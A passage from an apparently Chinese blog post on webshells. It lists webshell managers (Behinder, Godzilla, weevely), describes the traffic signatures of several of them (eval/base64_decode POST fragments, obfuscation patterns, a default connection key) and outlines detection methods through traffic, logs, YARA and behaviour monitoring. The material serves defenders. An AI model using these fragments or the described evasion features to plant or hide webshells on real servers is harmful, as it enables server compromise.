<li><p>冰蝎(Behinder)<br>  冰蝎是一款基于Java开发的动态二进制加密通信流量的新型Webshell客户端，由于它的通信流量被加密，使用传统的WAF、IDS等设备难以检测，目前在HW中使用较多的一款工具。下载下来的文件夹server 里的都是木马。<br>  功能介绍原文链接：<br>  《利用动态二进制加密实现新型一句话木马之客户端篇》 <a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/2799">https://xz.aliyun.com/t/2799</a><br>  工作原理原文链接：<br>  《利用动态二进制加密实现新型一句话木马之Java篇》 <a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/2744">https://xz.aliyun.com/t/2744</a><br>  《利用动态二进制加密实现新型一句话木马之.NET篇》 <a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/2758">https://xz.aliyun.com/t/2758</a><br>  《利用动态二进制加密实现新型一句话木马之PHP篇》 <a target="_blank" rel="noopener" href="https://xz.aliyun.com/t/2774">https://xz.aliyun.com/t/2774</a><br>  项目地址：<br>  <a target="_blank" rel="noopener" href="http://github.com/rebeyond/Behinder">http://github.com/rebeyond/Behinder</a></p>
</li>
<li><p>哥斯拉(Godzilla)<br>  哥斯拉是一款继冰蝎之后又一款于Java开发的加密通信流量的新型Webshell客户端，内置了3种有效载荷以及6种加密器，6种支持脚本后缀，20个内置插件，也是目前在HVV中使用较多的一款工具。<br>  项目地址：<a target="_blank" rel="noopener" href="https://github.com/BeichenDream/Godzilla">https://github.com/BeichenDream/Godzilla</a></p>
</li>
<li><p>weevely<br>  weevely 是 Linux 系统自带的菜刀，使用python编写的webshell工具，集webshell生成和连接于一身，采用c&#x2F;s模式构建，可以算作一款 php菜刀 替代工具，具有很好的隐蔽性。<br>  在linux上使用时还是很好的，集服务器错误配置审计，后门放置，暴力破解，文件管理，资源搜索，网络代理，命令执行，数据库操作，系统信息收集及端口扫描等功能。</p>
</li>
</ol>
<p>不同的Webshell管理工具的流量特征如下：<br><a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_45585955/article/details/130075885">https://blog.csdn.net/weixin_45585955/article/details/130075885</a></p>
<ol>
<li><strong>菜刀</strong><br> 首先请求体中传递的payload为base64编码，并且存在固定的，其次请求体中存在eval，base64等特征字符。最后传给cmd的这些流量字符中有自己的特征，1、都是系统命令；2、必须以分号结尾；3、数据包源一般是ip。<br> 中国菜刀2011版本及2014版本各语言WebShell链接流量特征<br> - PHP类WebShell链接流量<br>     其中特征主要在body中，将body中流量进行url解码后如下：<br>     其中特征点有如下三部分，<br>     第一：“eval”，eval函数用于执行传递的攻击payload，这是必不可少的；<br>     第二：<code>(base64_decode($_POST[z0]))，(base64_decode($_POST[z0]))</code>将攻击payload进行Base64解码，因为菜刀默认是将攻击载荷使用Base64编码，以避免被检测；<br>     第三：&amp;z0&#x3D;QGluaV9zZXQ…，该部分是传递攻击payload，此参数z0对应<code>$_POST[z0]</code>接收到的数据，该参数值是使用Base64编码的，所以可以利用base64解码可以看到攻击明文。<br>     注：<br>         1.有少数时候eval方法会被assert方法替代。<br>         2.$_POST也会被$_GET、$_REQUEST替代。<br>         3.z0是菜刀默认的参数，这个地方也有可能被修改为其他参数名。<br> - SP类WebShell链接流量：<br>     该流量是WebShell链接流量的第一段链接流量，其中特征主要在i&#x3D;A&amp;z0&#x3D;GB2312，菜刀链接JSP木马时，第一个参数定义操作，其中参数值为A-Q，如i&#x3D;A，第二个参数指定编码，其参数值为编码，如z0&#x3D;GB2312，有时候z0后面还会接着又z1&#x3D;参数用来加入攻击载荷。<br>     注：其中参数名i、z0、z1这种参数名是会变的，但是其参数值以及这种形式是不会变得，最主要就是第一个参数值在A-Q，这种是不变的。<br> - ASP类WebShell链接流量：<br>     其中body流量进行URL解码后<br>     其中特征点有如下三部分，<br>     第一：“Execute”，Execute函数用于执行传递的攻击payload，这是必不可少的，这个等同于php类中eval函数；<br>     第二：OnError ResumeNext，这部分是大部分ASP客户端中必有的流量，能保证不管前面出任何错，继续执行以下代码。<br>     第三：Response.Write和Response.End是必有的，是来完善整个操作的。<br>     这种流量主要识别这几部分特征，在正常流量中基本没有。<br>     注：OnError Resume Next这个特征在大部分流量中存在，极少数情况没有。<br> 中国菜刀2016版本各语言WebShell链接流量特征：<br> - PHP类WebShell链接流量：<br>     其中特征主要在body中，将body中部分如下：<br>     这个版本中流量最大的改变就是将特征进行打断混淆，这也给我们识别特征提供一种思路。<br>     其中特征点有如下三部分，<br>     第一：“”Ba”.”SE6”.”4_dEc”.”OdE”，这部分是将base64解码打断使用.来连接。<br>     第二：@ev”.”al，这部分也是将@eval这部分进行打断连接，可以识别这段代码即可。<br>     第三：QGluaV9zZXQoImRpc3BsYXlf…，该部分是传递攻击payload，payload依旧使用Base64编码的，所以可以利用base64解码可以看到攻击明文来识别。<br>     注：有少数时候eval方法会被assert方法替代。<br> - JSP类WebShell链接流量:<br>     该版本JSPwebshell流量与之前版本一样，<br>     所以分析如上：该流量是WebShell链接流量的第一段链接流量，其中特征主要在i&#x3D;A&amp;z0&#x3D;GB2312，菜刀链接JSP木马时，第一个参数定义操作，其中参数值为A-Q，如i&#x3D;A，第二个参数指定编码，其参数值为编码，如z0&#x3D;GB2312，有时候z0后面还会接着又z1&#x3D;、z2&#x3D;参数用来加入攻击载荷。<br>     注：其中参数名i、z0、z1这种参数名是会变的，但是其参数值以及这种形式是不会变得，最主要就是第一个参数值在A-Q，这种是不变的。<br> - ASP类WebShell链接流量：<br>     其中body流量为：<br>     2016版本流量这链接流量最大的变化在于body中部分字符被unicode编码替换混淆，所以这种特征需要提取出一种形式来，匹配这个混淆特征，比如“字符+%u0000+字符+%u0000”这种形式来判断该流量。<br>     或者直接将这部分代码直接进行unicode解码，可以获取到如2011或2014版本的asp所示的流量。可以根据上一段特征来进行判断。<br>     这种流量主要识别这几部分特征，在正常流量中基本没有。</li>
<li><strong>蚁剑</strong>：使用base64加密，流量中包含<code>@ini_set (&quot;display_errors&quot;,&quot;0&quot;)</code>代码<br> 蚁剑流量特征概述：<br> 可以对流量进行加密、混淆。但是有些关键代码没有被加密，如：PHP中的ini_set；ASP中的OnError，response等，流量特征：使用bse64加密的payload，数据包存在以下base加密的eval命令执行，数据包的payload内容存在几个分段内容，分别都使用base加密，解密后可以看到相关的路径，命令等；<br> （1）蚁剑PHP类WebShell链接流量<br> 其中body流量进行URL解码后为：<br> 其中流量最中明显的特征为@ini_set(“display_errors”,”0”);这段代码基本是所有WebShell客户端链接PHP类WebShell都有的一种代码，但是有的客户端会将这段编码或者加密，而蚁剑是明文，所以较好发现。<br> （2）蚁剑ASP类WebShell链接流量<br> 其中body流量进行URL解码后为：<br> 我们可以看出蚁剑针对ASP类的WebShell流量与菜刀的流量很像，其中特征也是相同，如OnError ResumeNext、Response.End、Response.Write，其中execute在蚁剑中被打断混淆了，变成了拼接形式Ex”&amp;cHr(101)&amp;”cute，同时该流量中也使用了eval参数，可以被认为明显特征。</li>
<li><strong>冰蝎</strong>：客户端以Get形式发起带密码的请求，服务端产生随机密钥并返回给客户端，客户端用AES加密payload。默认连接密码为”e45e329feb5d925b”。<br> 冰蝎流量特征概述：是一款动态二进制加密网站管理客户端。主要用于配合服务端shell的动态二进制加密通信，适用于WAF拦截回显等场景，客户端的流量无法检测。<br> （1）冰蝎3.0：<br> 随着冰蝎的不断更新，功能越来越完善，到3.0已经具备了红队需要的各种功能，特别是反弹shell的msf和cs上线，以及自定义代码执行，灵活性很强。基本做到开箱即用且功能齐全，唯一的问题是，工具流行之后，webshell本体容易被查杀，需要做webshell本体的免杀。<br> 由于冰蝎把类动态加载这个关键技术摆在台面上，在一段时间的研究后，Java内存马已经有了很多可用的思路，比如新增filter，只从内存操作，不依赖落地文件，就能访问到内存中的Webshell，这就解决了webshell本体免杀问题。 这种情况下冰蝎更新v3.0 beta7版本，增加了Java内存马功能，并且使用了更高级的Java Agent技术，通过hook Java进程中原本正常的类，实现内存马功能，并在beta8增加了内存马防查杀机制。<br> （2）冰蝎4.0<br> 冰蝎更新了4.0版本，增加了webshell生成功能，可以完全自定义流量加密方法，对流量加密的灵活性又大大增加。在webshell工具领域，冰蝎独占鳌头。在去年的攻防演练中统计到的webshell有效攻击中，有80%都是使用的冰蝎或冰蝎变种，足以证明冰蝎的强大功能。 </li>
<li><strong>哥斯拉</strong><br> <a target="_blank" rel="noopener" href="https://blog.csdn.net/weixin_46684578/article/details/122148960">https://blog.csdn.net/weixin_46684578/article/details/122148960</a><br> <a target="_blank" rel="noopener" href="https://www.cnblogs.com/danyue/p/18146698">https://www.cnblogs.com/danyue/p/18146698</a><br> <a target="_blank" rel="noopener" href="https://blog.csdn.net/m0_74077634/article/details/141931463">https://blog.csdn.net/m0_74077634/article/details/141931463</a><br> <a target="_blank" rel="noopener" href="https://www.cnblogs.com/smileleooo/p/18178347">https://www.cnblogs.com/smileleooo/p/18178347</a><br> 是基于流量、HTTP全加密的webshell工具；哥斯拉全部类型的shell 能绕过市面所有静态查杀；哥斯拉流量加密能绕过市面全部流量waf。</li>
</ol>
<h2 id="Webshell检测方法"><a href="#Webshell检测方法" class="headerlink" title="Webshell检测方法"></a>Webshell检测方法</h2><p>你所不知道的Webshell–进阶篇 <a target="_blank" rel="noopener" href="https://cloud.tencent.com/developer/article/1647762">https://cloud.tencent.com/developer/article/1647762</a><br>目前检测Webshell的方式较多，有基于HTTP流量、基于Web访问日志、基于文件特征等方法<br>继上期介绍了Webshell的基础知识和防护技巧后，本期我们将深入探讨Webshell的检测方法。由于Webshell的隐蔽性和多变性，仅依靠单一手段难以有效检测。因此，本文将重点介绍多种检测方法，以协助安全人员全面了解并部署有效的Webshell检测策略。</p>
<ol>
<li>基于HTTP流量的检测<br>  利用网络监控工具分析HTTP流量是检测Webshell活动的一种有效手段。通过监控异常的HTTP请求，如非标准时间的高频请求、含有异常参数的请求等，可以初步判断是否存在Webshell活动。<br>  <strong>实施步骤：</strong></li>
</ol>
<ul>
<li><strong>部署网络嗅探工具</strong>，如Wireshark或tcpdump，捕捉经过的HTTP包。</li>
<li><strong>分析HTTP请求</strong>，特别注意POST请求，这类请求通常用于Webshell命令的传输。</li>
<li><strong>标记异常模式</strong>，如频繁访问、大量上传下载或者命令参数等。</li>
</ul>
<ol start="2">
<li>基于Web访问日志的检测<br>  Web服务器的访问日志记录了所有进入网站的请求，通过分析这些日志，可以发现异常访问模式或疑似Webshell的踪迹。</li>
</ol>
<p>  <strong>实施步骤：</strong></p>
<ul>
<li><strong>收集访问日志</strong>，如Apache的access.log，Nginx的access.log。</li>
<li><strong>使用日志分析工具</strong>，如GoAccess或ELK Stack（Elasticsearch, Logstash, Kibana），对日志文件进行深入分析。</li>
<li><strong>设置警报</strong>，对于异常的访问模式，如非业务时间的大量请求、频繁的后台路径访问等，设置自动警报。</li>
</ul>
<ol start="3">
<li>基于文件特征的检测<br>  文件特征检测通过分析Webshell的代码模式进行识别。该方法依赖于更新的数据库和特征码，用于识别已知的Webshell。</li>
</ol>
<p>  <strong>实施步骤：</strong></p>
<ul>
<li><strong>使用YARA工具</strong>，根据已知的Webshell特征创建规则。</li>
<li><strong>定期更新规则库</strong>，跟随新的Webshell变化更新。</li>
<li><strong>扫描Web目录</strong>，将YARA与定期扫描任务结合，检查服务器上的文件。</li>
</ul>
<ol start="4">
<li>基于行为分析的检测<br>  行为分析不依赖于Webshell的代码特征，而是通过监测系统的行为来识别异常。这包括文件的异常创建、修改，以及系统命令的异常调用等。</li>
</ol>
<p>  <strong>实施步骤：</strong></p>
<ul>
<li>**部署Sysmon (System Monitor)**，监控Windows环境下的系统活动，如进程创建、网络连接等。</li>
<li><strong>使用auditd服务</strong>，在Linux环境下监控关键文件的读写和执行行为。</li>
<li><strong>分析系统调用日志</strong>，对于使用系统管理命令如<code>netstat</code>、<code>ipconfig</code>等频繁的进程进行进一步分析。</li>
</ul>
<h2 id="逃避技术"><a href="#逃避技术" class="headerlink" title="逃避技术"></a>逃避技术</h2><p>详见webshell免杀笔记</p>

  </div>
</article>


    <div class="blog-post-comments">
        <div id="utterances_thread">
            <noscript>Please enable JavaScript to view the comments.</noscript>
        </div>
    </div>


        
          <div id="footer-post-container">
  <div id="footer-post">

    <div id="nav-footer" style="display: none">
      <ul>
        
          <li><a href="/">Home</a></li>
        
          <li><a href="/about/">About</a></li>
        
          <li><a href="/archives/">Writing</a></li>
        
          <li><a href="/search/">Search</a></li>
        
          <li><a href="/categories/">Categories</a></li>
        
          <li><a href="/idea/">Idea</a></li>
        
          <li><a target="_blank" rel="noopener" href="https://github.com/g0dam">Projects</a></li>
        
      </ul>
    </div>

    
    
      <div id="toc-footer" style="display: none">
        <ol class="toc"><li class="toc-item toc-level-2"><a class="toc-link" href="#%E5%9F%BA%E7%A1%80"><span class="toc-number">1.</span> <span class="toc-text">基础</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%83%A8%E7%BD%B2%E6%8A%80%E6%9C%AF"><span class="toc-number">2.</span> <span class="toc-text">部署技术</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Webshell%E7%9A%84%E7%B1%BB%E5%9E%8B"><span class="toc-number">3.</span> <span class="toc-text">Webshell的类型</span></a><ol class="toc-child"><li class="toc-item toc-level-3"><a class="toc-link" href="#1-%E5%A4%A7%E9%A9%AC%EF%BC%88Full-Featured-Shells%EF%BC%89"><span class="toc-number">3.1.</span> <span class="toc-text">1. 大马（Full-Featured Shells）</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#2-%E5%B0%8F%E9%A9%AC%EF%BC%88Simple-Shells%EF%BC%89"><span class="toc-number">3.2.</span> <span class="toc-text">2. 小马（Simple Shells）</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#3-%E4%B8%80%E5%8F%A5%E8%AF%9D%E6%9C%A8%E9%A9%AC%EF%BC%88One-liner-Shells%EF%BC%89"><span class="toc-number">3.3.</span> <span class="toc-text">3. 一句话木马（One-liner Shells）</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#4-%E6%89%93%E5%8C%85%E9%A9%AC%EF%BC%88Packing-Shells%EF%BC%89"><span class="toc-number">3.4.</span> <span class="toc-text">4. 打包马（Packing Shells）</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#5-%E6%8B%96%E5%BA%93%E9%A9%AC%EF%BC%88Database-Dump-Shells%EF%BC%89"><span class="toc-number">3.5.</span> <span class="toc-text">5. 拖库马（Database Dump Shells）</span></a></li><li class="toc-item toc-level-3"><a class="toc-link" href="#6-%E5%86%85%E5%AD%98%E9%A9%AC%EF%BC%88In-Memory-Shells%EF%BC%89"><span class="toc-number">3.6.</span> <span class="toc-text">6. 内存马（In-Memory Shells）</span></a></li></ol></li><li class="toc-item toc-level-2"><a class="toc-link" href="#WebShell%E7%AE%A1%E7%90%86%E5%B7%A5%E5%85%B7"><span class="toc-number">4.</span> <span class="toc-text">WebShell管理工具</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#Webshell%E6%A3%80%E6%B5%8B%E6%96%B9%E6%B3%95"><span class="toc-number">5.</span> <span class="toc-text">Webshell检测方法</span></a></li><li class="toc-item toc-level-2"><a class="toc-link" href="#%E9%80%83%E9%81%BF%E6%8A%80%E6%9C%AF"><span class="toc-number">6.</span> <span class="toc-text">逃避技术</span></a></li></ol>
      </div>
    

    <div id="share-footer" style="display: none">
      <ul>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.facebook.com/sharer.php?u=https://godreams.cn/2024/10/18/WebSecurity/webshell/webshell/"><i class="fab fa-facebook fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://twitter.com/share?url=https://godreams.cn/2024/10/18/WebSecurity/webshell/webshell/&text=【Web安全】深入理解Webshell：部署、检测与防御"><i class="fab fa-twitter fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.linkedin.com/shareArticle?url=https://godreams.cn/2024/10/18/WebSecurity/webshell/webshell/&title=【Web安全】深入理解Webshell：部署、检测与防御"><i class="fab fa-linkedin fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://pinterest.com/pin/create/bookmarklet/?url=https://godreams.cn/2024/10/18/WebSecurity/webshell/webshell/&is_video=false&description=【Web安全】深入理解Webshell：部署、检测与防御"><i class="fab fa-pinterest fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" href="mailto:?subject=【Web安全】深入理解Webshell：部署、检测与防御&body=Check out this article: https://godreams.cn/2024/10/18/WebSecurity/webshell/webshell/"><i class="fa-solid fa-envelope fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://getpocket.com/save?url=https://godreams.cn/2024/10/18/WebSecurity/webshell/webshell/&title=【Web安全】深入理解Webshell：部署、检测与防御"><i class="fab fa-get-pocket fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://reddit.com/submit?url=https://godreams.cn/2024/10/18/WebSecurity/webshell/webshell/&title=【Web安全】深入理解Webshell：部署、检测与防御"><i class="fab fa-reddit fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.stumbleupon.com/submit?url=https://godreams.cn/2024/10/18/WebSecurity/webshell/webshell/&title=【Web安全】深入理解Webshell：部署、检测与防御"><i class="fab fa-stumbleupon fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://digg.com/submit?url=https://godreams.cn/2024/10/18/WebSecurity/webshell/webshell/&title=【Web安全】深入理解Webshell：部署、检测与防御"><i class="fab fa-digg fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="http://www.tumblr.com/share/link?url=https://godreams.cn/2024/10/18/WebSecurity/webshell/webshell/&name=【Web安全】深入理解Webshell：部署、检测与防御&description="><i class="fab fa-tumblr fa-lg" aria-hidden="true"></i></a></li>
  <li><a class="icon" target="_blank" rel="noopener" href="https://news.ycombinator.com/submitlink?u=https://godreams.cn/2024/10/18/WebSecurity/webshell/webshell/&t=【Web安全】深入理解Webshell：部署、检测与防御"><i class="fab fa-hacker-news fa-lg" aria-hidden="true"></i></a></li>
</ul>

    </div>

    <div id="actions-footer">
        <a id="menu" class="icon" href="#" onclick="$('#nav-footer').toggle();return false;"><i class="fa-solid fa-bars fa-lg" aria-hidden="true"></i> Menu</a>
        
          <a id="toc" class="icon" href="#" onclick="$('#toc-footer').toggle();return false;"><i class="fa-solid fa-list fa-lg" aria-hidden="true"></i> TOC</a>
        
        <a id="share" class="icon" href="#" onclick="$('#share-footer').toggle();return false;"><i class="fa-solid fa-share-alt fa-lg" aria-hidden="true"></i> Share</a>
        <a id="top" style="display:none" class="icon" href="#" onclick="$('html, body').animate({ scrollTop: 0 }, 'fast');"><i class="fa-solid fa-chevron-up fa-lg" aria-hidden="true"></i> Top</a>
    </div>

  </div>
</div>

        
        <footer id="footer">
  <div class="footer-left">
    Copyright &copy;
    
    
    2024
    g0dam
  </div>
  <div class="footer-right">
    <nav>
      <ul>
        <!--
       --><li><a href="/">Home</a></li><!--
     --><!--
       --><li><a href="/about/">About</a></li><!--
     --><!--
       --><li><a href="/archives/">Writing</a></li><!--
     --><!--
       --><li><a href="/search/">Search</a></li><!--
     --><!--
       --><li><a href="/categories/">Categories</a></li><!--
     --><!--
       --><li><a href="/idea/">Idea</a></li><!--
     --><!--
       --><li><a target="_blank" rel="noopener" href="https://github.com/g0dam">Projects</a></li><!--
     -->
      </ul>
    </nav>
  </div>
</footer>

    </div>
    <!-- styles -->



  <link rel="preload" as="style" href="https://cdnjs.cloudflare.com/ajax/libs/font-awesome/6.4.0/css/all.min.css" crossorigin="anonymous" onload="this.onload=null;this.rel='stylesheet'"/>


    <!-- jquery -->

  <script src="https://cdnjs.cloudflare.com/ajax/libs/jquery/3.6.0/jquery.min.js" crossorigin="anonymous"></script>




<!-- clipboard -->

  
    <script src="https://cdnjs.cloudflare.com/ajax/libs/clipboard.js/2.0.7/clipboard.min.js" crossorigin="anonymous"></script>
  
  <script type="text/javascript">
  $(function() {
    // copy-btn HTML
    var btn = "<span class=\"btn-copy tooltipped tooltipped-sw\" aria-label=\"Copy to clipboard!\">";
    btn += '<i class="fa-regular fa-clone"></i>';
    btn += '</span>';
    // mount it!
    $(".highlight table").before(btn);
    var clip = new ClipboardJS('.btn-copy', {
      text: function(trigger) {
        return Array.from(trigger.nextElementSibling.querySelectorAll('.code')).reduce((str,it)=>str+it.innerText+'\n','')
      }
    });
    clip.on('success', function(e) {
      e.trigger.setAttribute('aria-label', "Copied!");
      e.clearSelection();
    })
  })
  </script>


<script src="/js/main.js"></script>

<!-- search -->

<!-- Baidu Analytics -->

<!-- Cloudflare Analytics -->

<!-- Disqus Comments -->

<!-- utterances Comments -->

    <script type="text/javascript">
      var utterances_repo = 'owner/githubrepo';
      var utterances_issue_term = 'pathname';
      var utterances_label = 'Comment';
      var utterances_theme = 'github-dark';

      (function(){
          var script = document.createElement('script');

          script.src = 'https://utteranc.es/client.js';
          script.setAttribute('repo', utterances_repo);
          script.setAttribute('issue-term', 'pathname');
          script.setAttribute('label', utterances_label);
          script.setAttribute('theme', utterances_theme);
          script.setAttribute('crossorigin', 'anonymous');
          script.async = true;
          (document.getElementById('utterances_thread')).appendChild(script);
      }());
  </script>

</body>
</html>
